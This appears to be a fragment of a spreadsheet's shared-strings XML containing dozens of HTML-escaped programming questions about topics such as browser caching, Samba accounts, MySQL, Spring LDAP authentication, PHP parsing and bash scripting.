    <t xml:space="preserve">&lt;p&gt;It's common to want browsers to cache resources - JavaScript, CSS, images, etc. until there is a new version available, and then ensure that the browser fetches and caches the new version instead.&lt;/p&gt;
&lt;p&gt;One solution is to embed a version number in the resource's filename, but will placing the resources to be managed in this way in a directory with a revision number in it do the same thing? Is the whole URL to the file used as a key in the browser's cache, or is it just the filename itself and some meta-data?&lt;/p&gt;
&lt;p&gt;If my code changes from fetching &lt;code&gt;/r20/example.js&lt;/code&gt; to &lt;code&gt;/r21/example.js&lt;/code&gt;, can I be sure that revision 20 of &lt;code&gt;example.js&lt;/code&gt; was cached, but now revision 21 has been fetched instead and it is now cached?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Samba, other non interactive accounts - noshell, nologin, or blank?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Conducting a user account cleanup accross Solaris and Redhat linux systems, many of which have a number of Samba shares. &lt;/p&gt;
&lt;p&gt;What preference do people have for creating the local unix accounts for non interactive Samba users? In particular, the shell entry:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;noshell&lt;/li&gt;
&lt;li&gt;nologin&lt;/li&gt;
&lt;li&gt;blank&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;And why?&lt;/p&gt;
&lt;p&gt;JB&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting a full list of the URLS in a rails application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I get a a complete list of all the urls that my rails application could generate? &lt;/p&gt;
&lt;p&gt;I don't want the routes that I get get form rake routes, instead I want to get the actul URLs corrosponding to all the dynmically generated pages in my application...&lt;/p&gt;
&lt;p&gt;Is this even possible?&lt;/p&gt;
&lt;p&gt;(Background: I'm doing this because I want a complete list of URLs for some load testing I want to do, which has to cover the entire breadth of the application)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do indicate the SQL default library in an IBM iSeries 2 connection string to an AS/400?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm connecting to an AS/400 stored procedure layer using the IBM iSeries Access for Windows package. This provides a .NET DLL with classes similar to those in the &lt;code&gt;System.Data&lt;/code&gt; namespace. As such we use their implementation of the connection class and provide it with a connection string.&lt;/p&gt;
&lt;p&gt;Does anyone know how I can amend the connection string to indicate the default library it should use?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySql - Create Table If Not Exists Else Truncate?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Here is the updated question:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;the current query is doing something like:&lt;br&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$sql1 = "TRUNCATE TABLE fubar";
$sql2 = "CREATE TEMPORARY TABLE IF NOT EXISTS fubar SELECT id, name FROM barfu";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The first time the method containing this is run, it generates an error message on the truncate since the table doesn't exist yet.&lt;/p&gt;
&lt;p&gt;Is my only option to do the &lt;code&gt;CREATE TABLE&lt;/code&gt;, run the &lt;code&gt;TRUNCATE TABLE&lt;/code&gt;, and then fill the table? (3 separate queries)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;original question was:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;
I've been having a hard time trying to figure out if the following is possible in MySql without having to write block sql:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE fubar IF NOT EXISTS ELSE TRUNCATE TABLE fubar
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I run truncate separately before the create table, and the table doesn't exist, then I get an error message.  I'm trying to eliminate that error message without having to add any more queries.&lt;/p&gt;
&lt;p&gt;This code will be executed using PHP.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why learn Perl, Python, Ruby if the company is using C++, C# or Java as the application language?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wonder why would a C++, C#, Java developer want to learn a dynamic language?&lt;/p&gt;
&lt;p&gt;Assuming the company won't switch its main development language from C++/C#/Java to a dynamic one what use is there for a dynamic language?&lt;/p&gt;
&lt;p&gt;What helper tasks can be done by the dynamic languages faster or better after only a few days of learning than with the static language that you have been using for several years?&lt;/p&gt;
&lt;h2&gt;Update&lt;/h2&gt;
&lt;p&gt;After seeing the first few responses it is clear that there are two issues.
My main interest would be something that is justifiable to the employer as an expense.
That is, I am looking for justifications for the employer to finance the learning of a dynamic language. Aside from the obvious that the employee will have broader view, the
employers are usually looking for some "real" benefit.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problem with Java 1.6 and Desktop.open()</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been using Destop.open() to launch a .pdf viewer on Windows machines, both Vista and XP, and most of them work just fine.  However, on one XP machine the call does not work, simply returning without throwing any exceptions, and the viewer does not launch.  On that machine the file association is properly set up as far as I can tell: double-clicking a .pdf works, as does the "start xxx.pdf" command on the command prompt.  I'm thinking it must be a Windows configuration issue, but can't put my finger on it.&lt;/p&gt;
&lt;p&gt;Has anyone else seen this problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you authenticate against an Active Directory server using Spring Security?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a Spring web application that requires users to login.  My company has an Active Directory server that I'd like to make use of for this purpose.  However, I'm having trouble using Spring Security to connect to the server.&lt;/p&gt;
&lt;p&gt;I'm using Spring 2.5.5 and Spring Security 2.0.3, along with Java 1.6.&lt;/p&gt;
&lt;p&gt;If I change the LDAP URL to the wrong IP address, it doesn't throw an exception or anything, so I'm wondering if it's even &lt;em&gt;trying&lt;/em&gt; to connect to the server to begin with.&lt;/p&gt;
&lt;p&gt;Although the web application starts up just fine, any information I enter into the login page is rejected.  I had previously used an InMemoryDaoImpl, which worked fine, so the rest of my application seems to be configured correctly.&lt;/p&gt;
&lt;p&gt;Here are my security-related beans:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  &amp;lt;beans:bean id="ldapAuthProvider" class="org.springframework.security.providers.ldap.LdapAuthenticationProvider"&amp;gt;
    &amp;lt;beans:constructor-arg&amp;gt;
      &amp;lt;beans:bean class="org.springframework.security.providers.ldap.authenticator.BindAuthenticator"&amp;gt;
        &amp;lt;beans:constructor-arg ref="initialDirContextFactory" /&amp;gt;
        &amp;lt;beans:property name="userDnPatterns"&amp;gt;
          &amp;lt;beans:list&amp;gt;
            &amp;lt;beans:value&amp;gt;CN={0},OU=SBSUsers,OU=Users,OU=MyBusiness,DC=Acme,DC=com&amp;lt;/beans:value&amp;gt;
          &amp;lt;/beans:list&amp;gt;
        &amp;lt;/beans:property&amp;gt;
      &amp;lt;/beans:bean&amp;gt;
    &amp;lt;/beans:constructor-arg&amp;gt;
  &amp;lt;/beans:bean&amp;gt;
  &amp;lt;beans:bean id="userDetailsService" class="org.springframework.security.userdetails.ldap.LdapUserDetailsManager"&amp;gt;
    &amp;lt;beans:constructor-arg ref="initialDirContextFactory" /&amp;gt;
  &amp;lt;/beans:bean&amp;gt;
  &amp;lt;beans:bean id="initialDirContextFactory" class="org.springframework.security.ldap.DefaultInitialDirContextFactory"&amp;gt;
    &amp;lt;beans:constructor-arg value="ldap://192.168.123.456:389/DC=Acme,DC=com" /&amp;gt;
  &amp;lt;/beans:bean&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I efficiently search an array to fill in form fields?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for an efficient way to pull the data I want out of an array called $submission_info so I can easily auto-fill my form fields. The array size is about 120.&lt;/p&gt;
&lt;p&gt;I want to find the field name and extract the content. In this case, the field name is &lt;strong&gt;loanOfficer&lt;/strong&gt; and the content is &lt;strong&gt;John Doe&lt;/strong&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Output of Print_r($submission_info[1]):
Array ( 
     [field_id] =&amp;gt; 2399 
     [form_id] =&amp;gt; 4 
     [field_name] =&amp;gt; loanOfficer 
     [field_test_value] =&amp;gt; ABCDEFGHIJKLMNOPQRSTUVWXYZ 
     [field_size] =&amp;gt; medium 
     [field_type] =&amp;gt; other 
     [data_type] =&amp;gt; string 
     [field_title] =&amp;gt; LoanOfficer 
     [col_name] =&amp;gt; loanOfficer 
     [list_order] =&amp;gt; 2 
     [admin_display] =&amp;gt; yes 
     [is_sortable] =&amp;gt; yes 
     [include_on_redirect] =&amp;gt; yes 
     [option_orientation] =&amp;gt; vertical 
     [file_upload_dir] =&amp;gt; 
     [file_upload_url] =&amp;gt; 
     [file_upload_max_size] =&amp;gt; 1000000 
     [file_upload_types] =&amp;gt; 
     [content] =&amp;gt; John Doe 
     ) 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to find the field name and extract the content. In this case, the field name is &lt;strong&gt;loanOfficer&lt;/strong&gt; and the content is &lt;strong&gt;John Doe&lt;/strong&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Distributed hierarchical clustering</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any algorithms that can help with hierarchical clustering?
Google's map-reduce has only an example of k-clustering. In case of hierarchical clustering, I'm not sure how it's possible to divide the work between nodes.
Other resource that I found is: &lt;a href="http://issues.apache.org/jira/browse/MAHOUT-19"&gt;http://issues.apache.org/jira/browse/MAHOUT-19&lt;/a&gt;
But it's not apparent, which algorithms are used.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to communicate with a windows service from an application that interacts with the desktop?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;With .Net what is the best way to interact with a service (i.e. how do most tray-apps communicate with their servers).  It would be preferred if this method would be cross-platform as well (working in Mono, so I guess remoting is out?)&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;Edit:&lt;/h3&gt;
&lt;p&gt;Forgot to mention, we still have to support Windows 2000 machines in the field, so WCF and anything above .Net 2.0 won't fly.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you maintain large t-sql procedures</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm about to inherit a set of large and complex set of stored procedures that do monthly processing on very large sets of data.&lt;/p&gt;
&lt;p&gt;We are in the process of debugging them so they match the original process which was written in VB6. The reason they decided to re write them in t-sql is because the vb process takes days and this new process takes hours.&lt;/p&gt;
&lt;p&gt;All this is fine, but how can I make these now massive chunks of t-sql code(1.5k+ lines) even remotely readable / maintainable.&lt;/p&gt;
&lt;p&gt;Any experience making t-sql not much of head ache is very welcome.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Resending invitation/action emails</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a web app that sends out emails in response to a user-initaited action. These emails prompt the recipient for a response (an URL is included related to the specific action.)&lt;/p&gt;
&lt;p&gt;I've got some users asking for a "resend" feature to push that email again. &lt;/p&gt;
&lt;p&gt;My objection is that if the original email ended up in a spam folder (or didn't make it all the first time), the same thing is likely to happen the second time. (I've confirmed that the emails haven't bounced; they were accepted by the recipient's mail server.)&lt;/p&gt;
&lt;p&gt;So what does the community think: is the ability to resend and email invitation/notification useful or pointless?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Object Oriented Update Approach</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been tasked with maintaining an application originally written in VB6. It has since been imported into VB .Net and to say the least the code is anything but Object Oriented. The code is riddled with classes which contain nothing more than Public Shared attributes(variables) and methods(functions), the result of which restricts the application from opening more than one project at a time.&lt;/p&gt;
&lt;p&gt;A project consists of a XML file which contains general project settings, as well as the location to an Access database which contains other project related data. Over the years the format of the XML file has been modified, and an update and versioning strategy has been adopted. The chosen strategy performs an update upon open whenever an old version is encountered. Thus far, updates have only consisted of rearranging data within the XML file or making database schema changes and moving data from the XML file to the database.&lt;/p&gt;
&lt;p&gt;Having quite a bit of background in OOP it's easy for me to see that a project should be a self contained object which other objects interact with. However, I fail to see how to apply the chosen update strategy in OOP.&lt;/p&gt;
&lt;p&gt;The problem of implementing the chosen update strategy in OOP has kept me from using OOP as of yet. If anyone has experience with such a task, or recommendations on how to proceeded I'd appreciate any assistance you can provide.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How does the Java for each loop work?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;List&amp;lt;String&amp;gt; someList = new ArrayList&amp;lt;String&amp;gt;();
// add "monkey", "donkey", "skeleton key" to someList
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;for (String item : someList) {
    System.out.println(item);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What would the equivalent for loop look like without using the for each syntax?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which language is useful to create a report for a valid C program</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone suggest me a helpful programming language which can be used to create a tool which will analyse the given C program and generate a txt report or html report containing information about the given program (function list, variable list etc).
The program I intend to build is similar to doxygen but i want it for my personal use.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Most common cause of "java.lang.NullPointerException" when dealing with XMLs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My strongest lead is that the code who deals with the incoming XMLs is actually receiving an invalid/incomplete file hence failing the DOM parsing. Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server 2005 Linked Server to DB2 Performance issue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a SQL Server 2005 machine with a JDE DB2 set up as a linked server.&lt;/p&gt;
&lt;p&gt;For some reason the performance of any queries from this box to the db2 box are horrible.&lt;/p&gt;
&lt;p&gt;For example. The following takes 7 mins to run from Management Studio&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT     *
FROM       F42119 
WHERE     SDUPMJ &amp;gt;= 107256
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Whereas it takes seconds to run in iSeries Navigator&lt;/p&gt;
&lt;p&gt;Any thoughts? I'm assuming some config issue.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MVC C# custom MvcRouteHandler - How to?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone have experiences in providing a custom MvcRouteHandler? In my application I'd like to implement a globalization-pattern like &lt;em&gt;http://mydomain/en/about&lt;/em&gt; or &lt;em&gt;http://mydomain/de/about&lt;/em&gt;. &lt;/p&gt;
&lt;p&gt;As for persistance, I'd like to have a cookie read as soon as a request arrives and if there is a language setting in this cookie apply it (so a user arriving at &lt;em&gt;http://mydomain/&lt;/em&gt; would be transferred to &lt;em&gt;http://mydomain/en/&lt;/em&gt; for example). If there is no cookie present, I'd like to get the first language the browser supports, apply this one and store it in this cookie.&lt;/p&gt;
&lt;p&gt;I guess this can't be done with the standard routing mechanism mvc provides in it's initial project template. In a newsgroup I got the tip to have a look at the MvcRouteHandler and implement my own. But its hard to find a sample on how to do that.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>AJAX - How to Pass value back to server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;First time working with UpdatePanels in .NET. &lt;/p&gt;
&lt;p&gt;I have an updatepanel with a trigger pointed to an event on a FormView control. The UpdatePanel holds a ListView with related data from a separate database.&lt;/p&gt;
&lt;p&gt;When the UpdatePanel refreshes, it needs values from the FormView control so that on the server it can use them to query the database.&lt;/p&gt;
&lt;p&gt;For the life if me, I can't figure out how to get those values. The event I'm triggering from has them, but I want the updatepanel to refresh asynchronously. How do I pass values to the load event on the panel?&lt;/p&gt;
&lt;p&gt;Googled this ad nauseum and can't seem to get to an answer here. A link or an explanation would be immensely helpful..&lt;/p&gt;
&lt;p&gt;Jeff&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP DOMDocument stripping HTML tags</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a small templating engine, and I'm using DOMDocument to parse the pages. My test page so far looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;block name="content"&amp;gt;
   &amp;lt;?php echo 'this is some rendered PHP! &amp;lt;br /&amp;gt;' ?&amp;gt;
   &amp;lt;p&amp;gt;Main column of &amp;lt;span&amp;gt;content&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/block&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And part of my class looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private function parse($tag, $attr = 'name')
{
    $strict = 0;
    /*** the array to return ***/
    $out = array();
    if($this-&amp;gt;totalBlocks() &amp;gt; 0)
    {
        /*** a new dom object ***/
        $dom = new domDocument;
        /*** discard white space ***/
        $dom-&amp;gt;preserveWhiteSpace = false;
        /*** load the html into the object ***/
        if($strict==1)
        {
            $dom-&amp;gt;loadXML($this-&amp;gt;file_contents);
        }
        else
        {
            $dom-&amp;gt;loadHTML($this-&amp;gt;file_contents);
        }
        /*** the tag by its tag name ***/
        $content = $dom-&amp;gt;getElementsByTagname($tag);
        $i = 0;
        foreach ($content as $item)
        {
            /*** add node value to the out array ***/
            $out[$i]['name'] = $item-&amp;gt;getAttribute($attr);
            $out[$i]['value'] = $item-&amp;gt;nodeValue;
            $i++;
        }
    }
    return $out;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have it working the way I want in that it grabs each &amp;lt;block&amp;gt; on the page and injects it's contents into my template, however, it is stripping the HTML tags within the &amp;lt;block&amp;gt;, thus returning the following without the &amp;lt;p&amp;gt; or &amp;lt;span&amp;gt; tags:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;this is some rendered PHP! Main column of content
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What am I doing wrong here? :) Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>php $_GET sort problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;here is the input  i am getting from my flash file &lt;/p&gt;
&lt;p&gt;process.php?Q2=898&amp;amp;Aa=Grade1&amp;amp;Tim=0%3A0%3A12&amp;amp;Q1=908&amp;amp;Bb=lkj&amp;amp;Q4=jhj&amp;amp;Q3=08&amp;amp;Cc=North%20America&amp;amp;Q0=1&lt;/p&gt;
&lt;p&gt;and in php i use this code
foreach ($_GET as $field =&gt; $label)
{
    $datarray[]=$_GET[$field];&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;echo  "$field :";
echo $_GET[$field];;
echo "&amp;lt;br&amp;gt;";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;i get this out put&lt;/p&gt;
&lt;p&gt;Q2 :898
Aa :Grade1
Tim :0:0:12
Q1 :908
Bb :lkj
Q4 :jhj
Q3 :08
Cc :North America
Q0 :1&lt;/p&gt;
&lt;p&gt;now my question is how do i sort it alphabaticaly so it should look like this 
Aa :Grade1
Bb :lkj
Cc :North America
Q0 :1
Q1 :908&lt;/p&gt;
&lt;p&gt;and so on....before i can insert it into the DB&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Determine if a function exists in bash</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Currently I'm doing some unit tests which are executed from bash. Unit tests are initialized, executed and cleaned up in a bash script. This script usualy contains an init(), execute() and cleanup() functions. But they are not mandatory. I'd like to test if they are or are not defined.&lt;/p&gt;
&lt;p&gt;I did this previously by greping and seding the source, but it seemed wrong. Is there a more elegant way to do this?&lt;/p&gt;
&lt;p&gt;Edit: The following sniplet works like a charm:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;fn_exists()
{
    type $1 | grep -q 'shell function'
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How much success is there working on ASP.NET decompiled by Reflector?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I just finished a small project where changes were required to a pre-compiled, but no longer supported, ASP.NET web site.  The code was ugly, but it was ugly before it was even compiled, and I'm quite impressed that everything still seems to work fine.&lt;/p&gt;
&lt;p&gt;It took some editing, e.g. to remove control declarations, as they get put in a generated file, and conflict with the decompiled base class, but nothing a few hours didn't cure.&lt;/p&gt;
&lt;p&gt;Now I'm just curious as to how many others have had how much success doing this.  I would actually like to write a CodeProject article on defining, if not automating, the reverse engineering process.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>OpenID providers - what stops malicious providers?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I like the OpenID idea.  I support it on my site, and use it wherever it's possible (like here!).  But I am not clear about one thing.  &lt;/p&gt;
&lt;p&gt;A site that supports OpenID basically accepts any OpenID provider out there, right?  How does that work with sites that want to reduce bot-signups?  What's to stop a malicious OpenID provider from setting up unlimited bot IDs automatically?&lt;/p&gt;
&lt;p&gt;I have some ideas, and will post them as a possible answer, but I was wondering if anyone can see something obvious that I've missed?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I make Perl ithreads in Windows run concurrently?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Perl script that I'm attempting to set up using Perl Threads (use threads).  When I run simple tests everything works, but when I do my actual script (which has the threads running multiple SQL*Plus sessions), each SQL*Plus session runs in order (i.e., thread 1's sqlplus runs steps 1-5, then thread 2's sqlplus runs steps 6-11, etc.).&lt;/p&gt;
&lt;p&gt;I thought I understood that threads would do concurrent processing, but something's amiss.  Any ideas, or should I be doing some other Perl magic?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Good Linux (Ubuntu) SVN client</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Subversion has a superb client on Windows (Tortoise, of course). Everything I've tried on Linux just - well - sucks in comparison....&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Designing a WPF map control</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm thinking about making a simple map control in WPF, and am thinking about the design of the basic map interface and am wondering if anyone has some good advice for this.  &lt;/p&gt;
&lt;p&gt;What I'm thinking of is using a ScrollViewer (sans scroll bars) as my "view port" and then stacking everything up on top of a canvas.  From Z-Index=0 up, I'm thinking:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Base canvas for lat/long calculations, control positioning, Z-Index stacking.&lt;/li&gt;
&lt;li&gt;Multiple Grid elements to represent the maps at different zoom levels.  Using a grid to make tiling easier.&lt;/li&gt;
&lt;li&gt;Map objects with positional data.&lt;/li&gt;
&lt;li&gt;Map controls (zoom slider, overview, etc).&lt;/li&gt;
&lt;li&gt;Scroll viewer with mouse move events for panning and zooming.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Any comments suggestions on how I should be building this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Different values of GetHashCode for inproc and stateserver session variables</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've recently inherited an application that makes very heavy use of session, including storing a lot of custom data objects in session. One of my first points of business with this application was to at least move the session data away from InProc, and off load it to either a stateserver or SQL Server.&lt;/p&gt;
&lt;p&gt;After I made all of the appropriate data objects serializable, and changed the web.config to use a state service, everything appeared to work fine. &lt;/p&gt;
&lt;p&gt;However, I found that this application does a lot of object comparisons using GetHashCode(). Methods that worked fine when the session was InProc no longer work because the HashCodes no longer match when they are supposed to. This appears to be the case when trying to find a specific child object from a parent when you know the child object's original hash code&lt;/p&gt;
&lt;p&gt;If I simply change the web.config back to using inproc, it works again.&lt;/p&gt;
&lt;p&gt;Anyone have any thoughts on where to begin with this?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;EDIT: &lt;/p&gt;
&lt;p&gt;qbeuek: thanks for the quick reply. In regards to:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The default implementation of GetHashCode in Object class return a hash value based on objects address in memory or something similar. If some other identity comparison is required, you have to override both Equals and GetHashCode.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I should have given more information on how they are using this. Basically, they have one parent data object, and there are several arrays of child objects. They happen to know the hash code for a particular object they need, so they are looping through a specific array of child objects looking for a hash code that matches. Once a match is found, they then use that object for other work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does DataGrid on CE 5.0 Compact Framework .NET support editing?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to get a DataGrid under CE 5.0 / .NET CF 2.0 that a user can edit.  The document at &lt;a href="http://msdn.microsoft.com/en-us/library/ms838165.aspx" rel="nofollow"&gt;http://msdn.microsoft.com/en-us/library/ms838165.aspx&lt;/a&gt; indicates that some environments do not support editing - &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;As there is no native support for
  editing in the DataGrid control, this
  needs to be implemented manually&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Do I need to implement this ugly example - which doesn't work very well as shown?&lt;/p&gt;
&lt;p&gt;The documentation is not clear about which .NET features are available on which platform.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to check if a String contains another String in a case insensitive manner in Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say I have two strings,&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;String s1 = "AbBaCca";
String s2 = "bac";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to perform a check returning that &lt;code&gt;s2&lt;/code&gt; is contained within &lt;code&gt;s1&lt;/code&gt;. I can do this with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;return s1.contains(s2);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am pretty sure that &lt;code&gt;contains()&lt;/code&gt; is case sensitive, however I can't determine this for sure from reading the documentation. If it is then I suppose my best method would be something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;return s1.toLowerCase().contains(s2.toLowerCase());
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;All this aside, is there another (possibly better) way to accomplish this without caring about case-sensitivity?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a specific name for the node that coresponds to a subtree?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm designing a web site navigation hierarchy. It's a tree of nodes.  Nodes represent web pages.&lt;/p&gt;
&lt;p&gt;Some nodes on the tree are special.  I need a name for them.&lt;/p&gt;
&lt;p&gt;There are multiple such nodes. Each is the "root" of a sub-tree with pages that have a distinct logo, style sheet, or layout. Think of different departments.&lt;/p&gt;
&lt;p&gt;&lt;img src="http://img518.imageshack.us/img518/153/subtreesfe1.gif" alt="site map with color-coded sub-trees" /&gt;&lt;/p&gt;
&lt;p&gt;What should I name this type of node?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is the syntax for the Wordpress style.css template element available anywhere?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've recently embarked upon the &lt;em&gt;grand voyage&lt;/em&gt; of Wordpress theming and I've been reading through the Wordpress documentation for how to write a theme.  One thing I came across &lt;a href="http://codex.wordpress.org/Theme_Development" rel="nofollow"&gt;here&lt;/a&gt; was that the &lt;code&gt;style.css&lt;/code&gt; file must contain a specific header in order to be used by the Wordpress engine.  They give a brief example but I haven't been able to turn up any formal description of what must be in the &lt;code&gt;style.css&lt;/code&gt; header portion.  Does this exist on the Wordpress site?  If it doesn't could we perhaps describe it here?&lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the best practices for using html with xml based languages like svg?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;From browsing on this site and elsewhere, I've learned that serving websites as xhtml at present &lt;a href="http://hixie.ch/advocacy/xhtml" rel="nofollow"&gt;is considered harmful&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Delivering xhtml and serving it as application/xhtml+xml isn't supported by the majority of people browsing at present, delivering xhtml as text/html is at best a placebo for myself, and at worst a recipe for breaking sites usually when you least need it happening.&lt;/p&gt;
&lt;p&gt;So we end up back at html 4.01. If I instead serve my pages as html 4.01, is it possible to use SVG or any other xml-based language on the page?&lt;/p&gt;
&lt;p&gt;If so, how?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where to find Java 6 JSSE/JCE Source Code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Where can I download the JSSE and JCE source code for the latest release of Java?  The source build available at &lt;a href="https://jdk6.dev.java.net/"&gt;https://jdk6.dev.java.net/&lt;/a&gt; does not include the javax.crypto (JCE) packages nor the com.sun.net.ssl.internal (JSSE) packages.&lt;/p&gt;
&lt;p&gt;Not being able to debug these classes makes solving SSL issues incredibly difficult.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In Rails, after using find with :select, my objects don't save</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Running something like:&lt;/p&gt;
&lt;p&gt;@users = User.find(:first, :select =&gt; "name, lastname, salary")
for @user in @users do
  @user.salary = 100000
  @user.save
end&lt;/p&gt;
&lt;p&gt;After this looking up in the Mysql table, the users aren't updated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET library for processing HTML e-mails &amp; stripping previous responses</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know of a .NET library that will process HTML e-mails and can be used to trim out the reply-chain?  It needs to be able to accept HTML -or- text mails and then trim out everything but the actual response, removing the trail of messages that are not original content.  I don't expect it to be able to handle responseswhen they're interleaved into the previous mail ("responses in-line") - that case can fail.&lt;/p&gt;
&lt;p&gt;We have a home-built one based on SgmlReader and a series of XSL transforms, but it requires constant maintenance to deal with new e-mail clients.  I'd like to find one I can buy... :)&lt;/p&gt;
&lt;p&gt;Thanks,
Steve&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mocking WebResponse's from a WebRequest</t>
  </si>
  <si>
